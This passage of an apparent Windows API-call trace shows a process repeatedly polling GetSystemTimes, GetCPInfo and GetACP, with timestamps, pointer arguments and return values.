() returned 0x4e4 [0079.338] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.338] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.339] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.339] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.339] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.339] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.339] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.339] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.339] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.339] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.339] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.339] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.339] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.339] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.339] GetACP () returned 0x4e4 [0079.340] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.340] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.340] GetACP () returned 0x4e4 [0079.340] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.340] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.340] GetACP () returned 0x4e4 [0079.340] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.340] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.340] GetACP () returned 0x4e4 [0079.340] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.340] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.340] GetACP () returned 0x4e4 [0079.340] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.340] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.340] GetACP () returned 0x4e4 [0079.340] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.341] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.341] GetACP () returned 0x4e4 [0079.341] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.341] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.341] GetACP () returned 0x4e4 [0079.341] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.341] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.341] GetACP () returned 0x4e4 [0079.341] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.341] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.341] GetACP () returned 0x4e4 [0079.341] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.341] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.341] GetACP () returned 0x4e4 [0079.341] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.341] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.342] GetACP () returned 0x4e4 [0079.342] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.342] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.342] GetACP () returned 0x4e4 [0079.342] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.342] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.342] GetACP () returned 0x4e4 [0079.342] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.342] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.342] GetACP () returned 0x4e4 [0079.342] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.342] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.342] GetACP () returned 0x4e4 [0079.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.343] GetACP () returned 0x4e4 [0079.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.343] GetACP () returned 0x4e4 [0079.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.343] GetACP () returned 0x4e4 [0079.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.343] GetACP () returned 0x4e4 [0079.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.343] GetACP () returned 0x4e4 [0079.343] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.344] GetACP () returned 0x4e4 [0079.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.344] GetACP () returned 0x4e4 [0079.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.344] GetACP () returned 0x4e4 [0079.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.344] GetACP () returned 0x4e4 [0079.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.344] GetACP () returned 0x4e4 [0079.344] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.345] GetACP () returned 0x4e4 [0079.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.345] GetACP () returned 0x4e4 [0079.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.345] GetACP () returned 0x4e4 [0079.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.345] GetACP () returned 0x4e4 [0079.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.345] GetACP () returned 0x4e4 [0079.345] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.346] GetACP () returned 0x4e4 [0079.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.346] GetACP () returned 0x4e4 [0079.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.346] GetACP () returned 0x4e4 [0079.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.346] GetACP () returned 0x4e4 [0079.346] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.347] GetACP () returned 0x4e4 [0079.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.347] GetACP () returned 0x4e4 [0079.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.347] GetACP () returned 0x4e4 [0079.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.347] GetACP () returned 0x4e4 [0079.347] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.348] GetACP () returned 0x4e4 [0079.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.348] GetACP () returned 0x4e4 [0079.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.348] GetACP () returned 0x4e4 [0079.348] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.349] GetACP () returned 0x4e4 [0079.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.349] GetACP () returned 0x4e4 [0079.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.349] GetACP () returned 0x4e4 [0079.349] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.424] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.424] GetACP () returned 0x4e4 [0079.424] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.424] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.424] GetACP () returned 0x4e4 [0079.424] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.424] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.424] GetACP () returned 0x4e4 [0079.424] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.425] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.425] GetACP () returned 0x4e4 [0079.425] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.425] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.425] GetACP () returned 0x4e4 [0079.425] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.425] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.425] GetACP () returned 0x4e4 [0079.425] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.425] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.425] GetACP () returned 0x4e4 [0079.425] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.425] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.425] GetACP () returned 0x4e4 [0079.425] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.425] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.425] GetACP () returned 0x4e4 [0079.425] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.426] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.426] GetACP () returned 0x4e4 [0079.426] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.426] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.426] GetACP () returned 0x4e4 [0079.426] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.426] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.426] GetACP () returned 0x4e4 [0079.426] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.426] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.426] GetACP () returned 0x4e4 [0079.426] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.426] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.426] GetACP () returned 0x4e4 [0079.426] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.427] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.427] GetACP () returned 0x4e4 [0079.427] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.427] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.427] GetACP () returned 0x4e4 [0079.427] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.427] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.427] GetACP () returned 0x4e4 [0079.427] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.427] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.427] GetACP () returned 0x4e4 [0079.427] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.427] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.427] GetACP () returned 0x4e4 [0079.427] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.428] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.428] GetACP () returned 0x4e4 [0079.428] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.428] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.428] GetACP () returned 0x4e4 [0079.428] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.428] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.428] GetACP () returned 0x4e4 [0079.428] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.428] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.428] GetACP () returned 0x4e4 [0079.428] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.428] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.428] GetACP () returned 0x4e4 [0079.428] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0079.428] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0079.428] GetACP () returned 0x4e4 [0079.429] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, 